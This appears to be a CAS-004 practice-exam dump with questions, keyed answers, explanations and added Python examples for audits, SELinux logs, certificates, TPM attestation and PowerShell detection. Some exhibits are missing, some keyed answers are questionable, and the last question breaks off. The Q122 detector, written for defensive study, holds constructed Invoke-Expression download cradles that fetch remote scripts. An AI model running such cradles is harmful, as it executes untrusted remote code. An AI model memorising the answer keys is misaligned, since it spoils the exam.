CAS-004 Practice Exam and Study Guides - Verified By TestValid Updated 362 Questions [Q103-Q127]


NEW QUESTION # 103
A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.
Which of the following should the engineer report as the ARO for successful breaches?

  • A. 0.5
  • B. 0
  • C. 1
  • D. 36,500

Answer: A

Explanation:
The annualized rate of occurrence (ARO) is the expected number of times an event happens in one year. Two successful breaches over four years gives ARO = 2 / 4 = 0.5, i.e. one successful breach every two years. The 100 attempted breaches per day (36,500 per year, option D) is the attempt rate, not the rate of successful breaches, and is a distractor; nothing in the ARO calculation is multiplied by 365. The ARO then feeds the annualized loss expectancy, ALE = SLE x ARO.


NEW QUESTION # 104
A security engineer needs to review the configurations of several devices on the network to meet the following requirements:
* The PostgreSQL server must only allow connectivity from the 10.1.2.0/24 subnet.
* The SSH daemon on the database server must be configured to listen on port 4022.
* The SSH daemon must only accept connections from a single workstation.
* All host-based firewalls must be disabled on all workstations.
* All devices must have the latest updates from within the past eight days.
* All HDDs must be configured to secure data at rest.
* Cleartext services are not allowed.
* All devices must be hardened when possible.
Instructions:
Click on the various workstations and network devices to review the posture assessment results. Remediate any possible issues or indicate that no issue is found.
Click on Server A to review output data. Select commands in the appropriate tab to remediate connectivity problems to the PostgreSQL database via SSH.

Devices in the exhibit: WAP A, PC A, Laptop A, Switch A, Switch B, Laptop B, PC B, PC C, Server A

Answer:

Explanation:
WAP A: No issue found. WAP A is configured correctly and meets the requirements.
PC A: Disable the host-based firewall
The requirements state that host-based firewalls must be disabled on all workstations, so PC A is non-compliant while its firewall is enabled. Turning the firewall off removes a layer of protection and makes the workstation reachable from any host on its segment, so the remaining controls (endpoint protection, prompt patching, disk encryption, removal of unneeded services) carry more weight once it is gone.
Laptop A: Patch management
Laptop A is missing updates from within the past eight days. Installing the outstanding updates brings it into compliance and closes the publicly known vulnerabilities the scan is reporting. Updates may require a reboot and some downtime, so back up important data and close open applications before applying them.
Switch A: No issue found. Switch A is configured correctly and meets the requirements.
Switch B: No issue found. Switch B is configured correctly and meets the requirements.
Laptop B: Disable unneeded services
Laptop B runs a telnet service on TCP port 23. Telnet transmits credentials and session data in cleartext, exposing them to eavesdropping and modification by anyone on the path, and the requirements forbid cleartext services. Stopping and disabling telnet brings the laptop into compliance; if remote administration is still needed, provide it over SSH, which encrypts the session.
PC B: Enable disk encryption
PC B's HDD is not encrypted, so its data at rest is readable by anyone who removes the drive or boots another OS. Enabling full-disk encryption (BitLocker, LUKS, VeraCrypt or similar) protects the confidentiality of the data at rest and satisfies the requirement. Expect a small performance cost and a pre-boot or OS-level authentication step, back up the data before encrypting, and store the recovery key somewhere other than the machine itself.
PC C: Disable unneeded services
PC C is a workstation running an SSH daemon on TCP port 22. None of the requirements call for a workstation to accept inbound SSH, and "all devices must be hardened when possible" means unneeded listening services are removed, so the daemon should be stopped and disabled. Moving it to a non-default port is not a hardening measure in itself; the port 4022 and single-workstation requirements apply to the SSH daemon on the database server, where they are set in the daemon's configuration file, for example with
sudo nano /etc/ssh/sshd_config
by setting the port to 4022, restricting the accepted source to the one administrative workstation, and restarting the service.
Server A: Select the commands that restrict PostgreSQL connections to the 10.1.2.0/24 subnet, move the SSH daemon to port 4022, and limit SSH to the single administrative workstation, then verify connectivity to the database over SSH from that workstation.
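The following is an added example, not part of the exam item or its exhibit: a small audit that checks a database server's sshd_config and pg_hba.conf against the Server A requirements above. The 10.1.2.0/24 subnet and port 4022 come from the question; the single administrative workstation address 10.1.2.50, the user name dba, and both "before" and "after" configuration files are constructed for the example.

```python
import ipaddress

# Values taken from the question.
ALLOWED_DB_SUBNET = ipaddress.ip_network("10.1.2.0/24")
REQUIRED_SSH_PORT = 4022
# Assumption for this example: the one workstation allowed to reach sshd.
ADMIN_WORKSTATION = "10.1.2.50"

# Constructed sample configs (not from the exam exhibit).
SSHD_CONFIG_BEFORE = """\
# /etc/ssh/sshd_config (as found)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

SSHD_CONFIG_AFTER = """\
# /etc/ssh/sshd_config (remediated)
Port 4022
PermitRootLogin no
PasswordAuthentication no
AllowUsers dba@10.1.2.50
"""

PG_HBA_BEFORE = """\
# TYPE  DATABASE  USER  ADDRESS       METHOD
local   all       all                 peer
host    all       all   0.0.0.0/0     md5
"""

PG_HBA_AFTER = """\
# TYPE  DATABASE  USER  ADDRESS       METHOD
local   all       all                 peer
hostssl all       all   10.1.2.0/24   scram-sha-256
"""


def parse_sshd_config(text):
    """Return {keyword: [values...]} for non-comment sshd_config lines.
    Keywords are case-insensitive; repeated keywords (e.g. AllowUsers) accumulate."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).extend(value.split())
    return conf


def audit_sshd(text):
    """Findings for the two SSH requirements: listen on 4022, accept one workstation only."""
    conf = parse_sshd_config(text)
    findings = []
    ports = conf.get("port", ["22"])  # sshd defaults to 22 when no Port line is present
    if ports != [str(REQUIRED_SSH_PORT)]:
        findings.append(f"sshd listens on {','.join(ports)}, required {REQUIRED_SSH_PORT}")
    allow = conf.get("allowusers", [])
    hosts = {spec.partition("@")[2] for spec in allow}  # user@host -> host
    if hosts != {ADMIN_WORKSTATION}:
        findings.append(f"AllowUsers does not restrict sshd to {ADMIN_WORKSTATION}: {allow or 'unrestricted'}")
    return findings


def audit_pg_hba(text):
    """Findings for network rows that reach outside 10.1.2.0/24 or permit non-TLS sessions."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":  # Unix-socket rows carry no ADDRESS column
            continue
        conn_type, _database, user, address = fields[:4]
        if conn_type == "host":  # 'host' matches SSL and non-SSL; cleartext is banned
            findings.append(f"host rule for {user}@{address} also accepts non-TLS connections; use hostssl")
        try:
            net = ipaddress.ip_network(address, strict=False)
        except ValueError:
            findings.append(f"{conn_type} rule for {user}@{address}: non-CIDR address, review manually")
            continue
        if not net.subnet_of(ALLOWED_DB_SUBNET):
            findings.append(f"{conn_type} rule for {user}@{address} is outside {ALLOWED_DB_SUBNET}")
    return findings


if __name__ == "__main__":
    for label, ssh, hba in (("before", SSHD_CONFIG_BEFORE, PG_HBA_BEFORE),
                            ("after", SSHD_CONFIG_AFTER, PG_HBA_AFTER)):
        print(label, audit_sshd(ssh) + audit_pg_hba(hba) or ["compliant"])
```

The checks are deliberately strict: a `host` row is flagged even when its address is inside the subnet, because the cleartext requirement is separate from the subnet requirement, and an absent `Port` line is treated as port 22, which is what sshd actually does.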


NEW QUESTION # 105
Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future?

  • A. BCP
  • B. RTO
  • C. BIA
  • D. BCM
  • E. SLA

Answer: A

Explanation:
A Business Continuity Plan (BCP) is the set of policies and procedures that define how an organization responds to and recovers from disruptions. It is designed to ensure that critical operations and services can be restored and maintained quickly; it identifies risks, sets out mitigations for them, and details the procedures to follow when a disruption occurs. A BIA and RTO are inputs to the plan rather than the plan itself, an SLA is a contract with a provider, and BCM is the broader management discipline. Resources:
CompTIA Advanced Security Practitioner (CASP+) Study Guide, Chapter 4: "Business Continuity Planning," Wiley, 2018. https://www.wiley.com/en-us/CompTIA+Advanced+Security+Practitioner+CASP%2B+Study+Guide%2C+2nd+Edition-p-9781119396582


NEW QUESTION # 106
An electric car company hires an IT consulting company to improve the cybersecurity of its vehicles.
Which of the following should achieve the BEST long-term result for the company?

  • A. Designing and developing add-on security components for fielded vehicles
  • B. Reviewing proposed designs and prototypes for cybersecurity vulnerabilities
  • C. Reviewing and influencing requirements for an early development vehicle
  • D. Performing a cyber-risk assessment on production vehicles

Answer: B


NEW QUESTION # 107
In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation?

  • A. Application/platform software
  • B. Application user access management
  • C. Application-specific data assets
  • D. Application-specific logic and code

Answer: A

Explanation:
In a PaaS implementation the provider takes on the operational duties for the application/platform software (option A): securing and maintaining the underlying infrastructure, operating systems, middleware, runtime environments, and the other software components that support the platform and the applications running on it, including patching, updating, scaling, and backing up the platform software.
The other three remain with the organization:
B) Application user access management. The organization defines and enforces its own policies for granting, revoking, and monitoring access to its applications and data, and ensures its users follow practices such as strong passwords and multifactor authentication.
C) Application-specific data assets. The organization owns and controls its own data, must ensure its confidentiality, integrity, and availability, and must comply with applicable data protection laws and regulations.
D) Application-specific logic and code. The organization develops, tests, deploys, and manages its own applications using the tools and services the platform provides, and must ensure those applications are secure, reliable, and performant.
https://www.techtarget.com/searchcloudcomputing/feature/The-cloud-shared-responsibility-model-for-IaaS-PaaS-and-SaaS


NEW QUESTION # 108
Device event logs sourced from MDM software are as follows:

Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?

  • A. Falsified status reporting; remotely wipe the device.
  • B. Impossible travel; disable the device's account and access while investigating.
  • C. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
  • D. Resource leak; recover the device for analysis and clean up the local storage.

Answer: C


NEW QUESTION # 109
A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable?

  • A. Containerization
  • B. Type 2 hypervisors
  • C. Virtualized emulators
  • D. Orchestration

Answer: A

Explanation:
Containerization packages an application together with its dependencies, libraries, and configuration files into an isolated, portable unit called a container. Containers share the host kernel, so they are lightweight, and they run on any host with a container runtime (Docker Engine, containerd), typically scheduled and managed by an orchestrator such as Kubernetes.
Containerization would allow the company to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components, because containerization would:
* Enable the application to be split into smaller, independent components (microservices) that communicate through APIs or message queues.
* Allow the application to consume cloud native services such as load balancers, managed databases, or serverless functions, wired in through configuration files or environment variables.
* Isolate each container from other containers and from the host, and allow fine-grained network policies and access control to be applied per container or group of containers (microsegmentation).
* Make the architecture portable: the same image runs on any cloud provider or platform that supports the container runtime, so moving it requires changes to deployment configuration rather than to the application code.
Type 2 hypervisors and emulators provide isolation but tie the workload to a full guest OS, and orchestration (option D) manages containers rather than providing the portable unit itself.


NEW QUESTION # 110
A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.
Which of the following will MOST likely secure the data on the lost device?

  • A. Require MFA to access company applications.
  • B. Remotely wipe the device.
  • C. Require a VPN to be active to access company data.
  • D. Set up different profiles based on the person's risk.

Answer: A


NEW QUESTION # 111
An organization recently recovered from an attack that featured an adversary injecting malicious logic into OS bootloaders on endpoint devices. Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the UEFI through the full loading of OS components. Which of the following TPM structures enables this storage functionality?

  • A. Platform configuration registers
  • B. Clock/counter structures
  • C. Endorsement tickets
  • D. Command tag structures with MAC schemes

Answer: A

Explanation:
Platform Configuration Registers (PCRs) are the TPM structures that hold boot measurements. During a measured boot each stage (UEFI firmware, bootloader, kernel, drivers) is hashed before it runs and the hash is "extended" into a PCR: the new register value is the hash of the old value concatenated with the new measurement. A PCR can therefore only be reset at reboot, never written directly, and its final value depends on every component measured and on the order in which they were measured. A verifier compares a signed quote of the PCR values against known-good values to detect that a bootloader was modified, which is exactly the tampering the organization suffered.


NEW QUESTION # 112
A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:
Despite the deny message, this action was still permitted. Which of the following is the MOST likely fix for this issue?

  • A. Create separate domain and context files for irc.
  • B. Rebuild the policy, reinstall, and test.
  • C. Add the objects of concern to the default context.
  • D. Set the devices to enforcing

Answer: D
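An added example, not part of the exam item: when SELinux (the MAC on Android) is in permissive mode, or a domain is marked permissive in the policy, AVC denials are still logged but the action proceeds, and the kernel marks such records with `permissive=1`. The parser below, written for this page, pulls that flag out of dmesg-style AVC lines and reports which source domains are effectively not enforcing. The three sample lines are constructed in the Android AVC format; the pids, inodes, contexts and the "irc" process name are assumptions, not the entries from the exam exhibit.

```python
import re
from collections import Counter

# Constructed dmesg lines in Android's SELinux AVC format (not from the exam exhibit).
SAMPLE_DMESG = """\
[   41.120333] type=1400 audit(1700000000.120:31): avc: denied { read } for pid=2871 comm="irc" name="hosts" dev="dm-0" ino=1452 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:system_file:s0 tclass=file permissive=1
[   41.120901] type=1400 audit(1700000000.120:32): avc: denied { open } for pid=2871 comm="irc" path="/system/etc/hosts" dev="dm-0" ino=1452 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:system_file:s0 tclass=file permissive=1
[   42.004110] type=1400 audit(1700000000.121:33): avc: denied { write } for pid=1302 comm="logd" name="cache" dev="dm-1" ino=77 scontext=u:r:logd:s0 tcontext=u:object_r:cache_file:s0 tclass=dir permissive=0
"""

AVC_RE = re.compile(
    r"avc:\s+(?P<result>denied|granted)\s+\{\s*(?P<perms>[^}]+?)\s*\}\s+for\s+(?P<fields>.*)$"
)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_avc(line):
    """Parse one AVC record into a dict, or return None for non-AVC lines."""
    m = AVC_RE.search(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m.group("fields"))}
    return {"result": m.group("result"), "perms": m.group("perms").split(), **fields}


def permissive_denials(text):
    """Records logged as 'denied' that the kernel nevertheless allowed (permissive=1)."""
    out = []
    for line in text.splitlines():
        rec = parse_avc(line)
        if rec and rec["result"] == "denied" and rec.get("permissive") == "1":
            out.append(rec)
    return out


def domains_not_enforcing(text):
    """Count permissive denials per source domain (the type field of scontext).
    Android contexts look like u:r:<type>:s0, so the type is the third field."""
    return Counter(r["scontext"].split(":")[2] for r in permissive_denials(text))


if __name__ == "__main__":
    for domain, n in domains_not_enforcing(SAMPLE_DMESG).items():
        print(f"{domain}: {n} denial(s) logged but allowed; set enforcing")
```

A device that reports `permissive=1` for the app domains is not enforcing the policy regardless of how the rules are written, which is why rebuilding the policy or adding contexts (the other options) would not change the outcome; the fix is to put the device, and any domain marked `permissive` in the policy, into enforcing mode and then re-test.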


NEW QUESTION # 113
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

  • A. Install anti-malware, HIPS, and host-based firewalls on each of the systems
  • B. Migrate the services to new systems with a supported and patched OS.
  • C. Patch the systems to the latest versions of the existing OSs
  • D. Segment the systems to reduce the attack surface if an attack occurs

Answer: B


NEW QUESTION # 114
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt?

  • A. OWASP
  • B. OSINT
  • C. MITRE ATT&CK
  • D. ISO

Answer: C

Explanation:
MITRE ATT&CK is a threat management framework that provides a comprehensive and detailed knowledge base of adversary tactics and techniques based on real-world observations. It can help security analysts to identify, understand, and prioritize potential threats, as well as to develop effective detection and response strategies. MITRE ATT&CK covers the entire lifecycle of a cyberattack, from initial access to impact, and provides information on how to mitigate, detect, and hunt for each technique. It also includes threat actor profiles, software descriptions, and data sources that can be used for threat intelligence and analysis. MITRE ATT&CK is the most likely resource that a security analyst would adopt to implement the most up-to-date and effective security methodologies for their clients. Verified References:
https://attack.mitre.org/
https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-top-10-mitre-att


NEW QUESTION # 115
A cloud security engineer is setting up a cloud-hosted WAF. The engineer needs to implement a solution to protect the multiple websites the organization hosts. The organization websites are:
* www.mycompany.org
* www.mycompany.com
* campus.mycompany.com
* wiki.mycompany.org
The solution must save costs and be able to protect all websites. Users should be able to notify the cloud security engineer of any on-path attacks. Which of the following is the BEST solution?

  • A. Purchase one SAN certificate.
  • B. Purchase one wildcard certificate.
  • C. Purchase one certificate for each website.
  • D. Implement self-signed certificates.

Answer: A

Explanation:
A single certificate with a Subject Alternative Name (SAN) list can name hostnames under any number of registered domains, so one SAN certificate covers all four sites (www.mycompany.org, www.mycompany.com, campus.mycompany.com, wiki.mycompany.org), is bought and renewed once, and is deployed once on the WAF. A wildcard certificate does not fit this list: *.mycompany.com matches www.mycompany.com and campus.mycompany.com, but a wildcard covers one label level under one domain only, so www.mycompany.org and wiki.mycompany.org would still need a second certificate for *.mycompany.org. (A SAN certificate may itself carry wildcard entries; *.mycompany.com plus *.mycompany.org in one SAN list would also satisfy the requirement.) One certificate per site multiplies cost and renewals, and self-signed certificates fail the last requirement: they produce the same browser warning an on-path attacker's forged certificate would, so users cannot tell the two apart and have nothing to report.
References: [CompTIA CASP+ Study Guide, Second Edition, page 301]
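The matching rules that decide this question, as an added example written for this page rather than taken from the exam: a hostname matches a certificate name only if the labels agree exactly, and a wildcard stands for exactly one label in the left-most position (the rules in RFC 6125 section 6.4.3, with partial wildcards such as w*.example.com rejected, as browsers do). The four hostnames are the ones from the question; the two certificate SAN lists are constructed.

```python
# The organization's sites, from the question.
SITES = ["www.mycompany.org", "www.mycompany.com", "campus.mycompany.com", "wiki.mycompany.org"]

# Constructed certificate contents for the comparison.
WILDCARD_CERT_SANS = ["*.mycompany.com"]
SAN_CERT_SANS = ["www.mycompany.org", "www.mycompany.com", "campus.mycompany.com", "wiki.mycompany.org"]


def dns_name_matches(pattern, hostname):
    """True if a certificate dNSName entry covers hostname.
    A '*' matches one whole label and only in the left-most position; it never
    spans several labels and never stands for a bare registered domain."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if len(p_labels) != len(h_labels):
        return False  # '*' cannot absorb extra labels (a.b.example.com)
    if p_labels[1:] != h_labels[1:]:
        return False  # everything right of the first label must match exactly
    first = p_labels[0]
    if first == "*":
        return len(h_labels) > 2  # refuse *.com-style wildcards on a public suffix
    if "*" in first:
        return False  # partial wildcards are not accepted
    return first == h_labels[0]


def uncovered(san_entries, hostnames):
    """Hostnames that no entry of the certificate's SAN list covers."""
    return [h for h in hostnames if not any(dns_name_matches(s, h) for s in san_entries)]


if __name__ == "__main__":
    print("wildcard leaves uncovered:", uncovered(WILDCARD_CERT_SANS, SITES))
    print("SAN cert leaves uncovered:", uncovered(SAN_CERT_SANS, SITES))
```

Running it shows the wildcard certificate leaving both .org hosts uncovered while the SAN certificate covers all four, which is the whole reason the cheaper-sounding wildcard is not the answer here.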


NEW QUESTION # 116
A security analyst observes the following while looking through network traffic in a company's cloud log:

Which of the following steps should the security analyst take FIRST?

  • A. Access 10.0.5.52 via EDR and identify processes that have network connections.
  • B. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
  • C. Isolate 10.0.50.6 via security groups.
  • D. Quarantine 10.0.5.52 and run a malware scan against the host.

Answer: D


NEW QUESTION # 117
An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft. Which of the following can be used to mitigate this risk?

  • A. A complete backup that is created before moving the data
  • B. Additional application firewall rules specific to the migration
  • C. An additional layer of encryption
  • D. A third-party data integrity monitoring solution

Answer: C

Explanation:
The company should add its own layer of encryption when moving the intellectual property to a CSP. Encrypting the data before it leaves the premises, with keys held by the organization rather than by the provider, means the provider's staff, a tenant-isolation failure, or an attacker who compromises the provider's storage sees only ciphertext, on top of whatever encryption the CSP applies at rest and in transit. Encryption protects confidentiality; it does not by itself stop modification unless an authenticated mode or a separate integrity check is used, which is why the integrity monitoring in option D does not address theft. A backup protects availability, not confidentiality, and firewall rules for the migration do nothing once the data is at the provider. Verified Reference:
https://learn.microsoft.com/en-us/partner-center/transition-seat-based-services
https://cloud.google.com/architecture/patterns-for-connecting-other-csps-with-gcp


NEW QUESTION # 118
Ransomware encrypted the entire human resources fileshare for a large financial institution.
Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?

  • A. Leave the current backup schedule intact and make the human resources fileshare read-only.
  • B. Decrease the frequency of backups and pay the ransom to decrypt the data.
  • C. Leave the current backup schedule intact and pay the ransom to decrypt the data.
  • D. Increase the frequency of backups and create SIEM alerts for IOCs.

Answer: D

Explanation:
Paying the ransom is not advisable: it funds the attackers and does not guarantee a working decryptor, and it does nothing about the backup gap that caused the problem. The last backup is 48 hours old against a 24-hour RPO, so the fileshare already exceeds the amount of data loss management has declared acceptable; the backup interval has to be shortened to 24 hours or less so that any restore point satisfies the RPO. The second finding, that security operations were unaware of the encryption until it was too late, is addressed by SIEM alerts on ransomware indicators of compromise (mass file renames, known ransom-note or extension patterns, unusual SMB write volumes) so the next incident is interrupted before the entire share is encrypted.


NEW QUESTION # 119
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost?

  • A. Option A
  • B. Option B
  • C. Option C
  • D. Option D

Answer: C


NEW QUESTION # 120
A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection?

  • A. HSM
  • B. PKI
  • C. UEFI/BIOS
  • D. TPM

Answer: D

Explanation:
A TPM (trusted platform module) is a hardware device that can provide boot loader protection by storing cryptographic keys and verifying the integrity of the boot process. An HSM (hardware security module) is similar to a TPM, but it is used for storing keys for applications, not for booting. A PKI (public key infrastructure) is a system of certificates and keys that can provide encryption and authentication, but not boot loader protection. UEFI/BIOS are firmware interfaces that control the boot process, but they do not provide protection by themselves. Verified Reference: https://www.comptia.org/blog/what-is-a-tpm-trusted-platform-module https://partners.comptia.org/docs/default-source/resources/casp-content-guide
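The measurement chain behind questions 111 and 120, as an added example written for this page (it is not exam content and not a real TPM driver): each boot stage is hashed and extended into a PCR, a verifier replays the event log to reproduce the PCR, and a mismatch exposes a tampered bootloader. The boot components are short constructed byte strings standing in for real firmware images, and the TPM's signature over the quote (which binds the PCR values to the device's attestation key) is assumed rather than implemented.

```python
import hashlib

PCR_SIZE = 32  # SHA-256 PCR bank


def pcr_extend(pcr, digest):
    """TPM PCR extend: PCR_new = SHA-256(PCR_old || digest).
    One-way and order-dependent; a PCR can only be reset by a reboot."""
    return hashlib.sha256(pcr + digest).digest()


def measure_boot(components):
    """Simulate firmware measuring each stage into one PCR before running it.
    Returns (final PCR value, event log of (name, digest))."""
    pcr = bytes(PCR_SIZE)  # PCRs start at all zeros after reset
    log = []
    for name, image in components:
        digest = hashlib.sha256(image).digest()
        log.append((name, digest))
        pcr = pcr_extend(pcr, digest)
    return pcr, log


def replay_log(log):
    """Verifier side: recompute the PCR from the event log the device sent."""
    pcr = bytes(PCR_SIZE)
    for _name, digest in log:
        pcr = pcr_extend(pcr, digest)
    return pcr


def attest(quoted_pcr, log, golden_pcr):
    """Accept only if the log reproduces the quoted PCR and that PCR is the known-good value.
    (A real quote is also signed by the TPM's attestation key; that check is assumed here.)"""
    return replay_log(log) == quoted_pcr and quoted_pcr == golden_pcr


# Constructed boot chain; the byte strings stand in for real images.
GOOD_CHAIN = [
    ("uefi_firmware", b"uefi v1.2"),
    ("bootloader", b"grub 2.06 signed"),
    ("kernel", b"vmlinuz-6.1"),
    ("initrd", b"initrd.img-6.1"),
]
# Same chain with malicious logic injected into the bootloader, as in question 111.
TAMPERED_CHAIN = [(n, b"grub 2.06 + implant" if n == "bootloader" else img) for n, img in GOOD_CHAIN]

GOLDEN_PCR, GOLDEN_LOG = measure_boot(GOOD_CHAIN)


if __name__ == "__main__":
    pcr, log = measure_boot(TAMPERED_CHAIN)
    print("golden  :", GOLDEN_PCR.hex())
    print("tampered:", pcr.hex())
    print("attestation passes:", attest(pcr, log, GOLDEN_PCR))
```

Because every later value is computed from the earlier one, the implant in the bootloader changes the final PCR even though the kernel and initrd measurements are unchanged, and an attacker who rewrites the event log to hide the implant cannot make the replayed value equal the quoted one.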


NEW QUESTION # 121
A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

  • A. Patch the infrastructure at the operating system.
  • B. Upgrade the service as part of life-cycle management.
  • C. Securely configure the authentication mechanisms.
  • D. Execute port scanning against the services.

Answer: C

Explanation:
The question is asking for the responsibility that stays with the DevOps team under the PaaS shared responsibility model. The provider patches the operating system underneath the managed databases, services, and gateway and upgrades those services through their life cycle, and port scanning is a periodic verification activity rather than an ongoing duty. What the provider cannot do for the team is decide who may call the API gateway and the services behind it: securely configuring the authentication mechanisms (gateway authentication, service identities, credential and secret handling) is the team's responsibility and the control most directly protecting a billing system.


NEW QUESTION # 122
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

  • A. Worm
  • B. Fileless
  • C. Rootkit
  • D. Logic bomb

Answer: B

Explanation:
Fileless malware runs in memory using tools already present on the host (here PowerShell's Invoke-Expression, which evaluates a string fetched from elsewhere as code) rather than dropping an executable, which is why scanning the disk found no indicators of compromise. Protection therefore has to cover the execution path rather than files: PowerShell script block logging and AMSI integration so the decoded script is visible to the endpoint protection, constrained language mode, and EDR that inspects behaviour in memory. A worm, rootkit, or logic bomb would each leave something on disk for the scan to find.
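An added example for this page, not part of the exam: the detection side of the scenario. Download-and-execute cradles built around Invoke-Expression have a recognisable shape in process command lines and script block logs (Windows event 4104), and an `-EncodedCommand` payload has to be base64-decoded from UTF-16LE before the same patterns can be matched. The three sample command lines are constructed; the hostname example.invalid and the script paths are placeholders.

```python
import base64
import re

# Constructed PowerShell command lines (none are from the exam scenario).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')".encode("utf-16-le")
).decode()
SAMPLES = [
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    f"powershell.exe -EncodedCommand {_ENCODED}",
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

# Indicators commonly combined in fileless download cradles (matched on lower-cased text).
CRADLE_PATTERNS = [
    (r"\binvoke-expression\b|\biex\b", "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", "download cradle"),
    (r"frombase64string", "base64 payload"),
    (r"-nop\b|-noprofile\b", "no profile"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:c|ncodedcommand)?\s+[a-z0-9+/=]{20,}", "encoded command"),
]
ENCODED_RE = re.compile(r"-e(?:c|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) so it can be inspected."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} ; decoded: {decoded}"


def cradle_indicators(cmdline):
    """Labels of every cradle pattern present in the command line (after decoding)."""
    text = decode_encoded_command(cmdline).lower()
    return [label for pat, label in CRADLE_PATTERNS if re.search(pat, text)]


if __name__ == "__main__":
    for line in SAMPLES:
        print(cradle_indicators(line) or "clean", "<-", line[:60])
```

Two or more indicators on one command line (Invoke-Expression together with a download primitive, or an encoded command that decodes to one) is the combination worth alerting on; a scheduled `-File` backup script matches none of them.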


NEW QUESTION # 123
Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

  • A. Reconfigure the WAF.
  • B. Review the Active Directory.
  • C. Update the marketing department's browser.
  • D. Modify the ACLs.

Answer: D

Explanation:
Modifying the ACLs (access control lists) is the most likely fix. ACLs define which users and groups may reach which resources; one department succeeding and another failing against the same application points to permissions that were granted to the HR group but not to the marketing group, or to the data sources marketing's reports depend on. Reviewing Active Directory may show the group memberships but does not by itself change access, a WAF blocks malicious requests rather than selectively denying one department, and a browser version would not explain a failure confined to one group's resources.


NEW QUESTION # 124
Which of the following testing plans is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions?

  • A. Parallel test
  • B. Full interruption test
  • C. Disaster recovery checklist
  • D. Tabletop exercise

Answer: D

Explanation:
A tabletop exercise is a type of testing plan that is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions. A tabletop exercise is a simulation of a potential disaster or incident that involves a verbal or written discussion of how each department would respond to it. The purpose of a tabletop exercise is to identify gaps, weaknesses, or conflicts in the disaster recovery plan, and to improve communication and coordination among the team members.


NEW QUESTION # 125
Which of the following describes the system responsible for storing private encryption/decryption keys with a third party to ensure these keys are stored safely?

  • A. Trust models
  • B. Key escrow
  • C. TPM
  • D. Code signing

Answer: B

Explanation:
Key escrow is the arrangement in which copies of private or decryption keys are deposited with a trusted third party so that encrypted data can be recovered if the key holder loses the key, leaves, or must be investigated. The escrow agent's own security and its key-release policy become part of the threat model. A trust model describes how certificate authorities relate to each other, a TPM stores keys on the local device, and code signing uses keys but does not safeguard them.


NEW QUESTION # 126
A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?

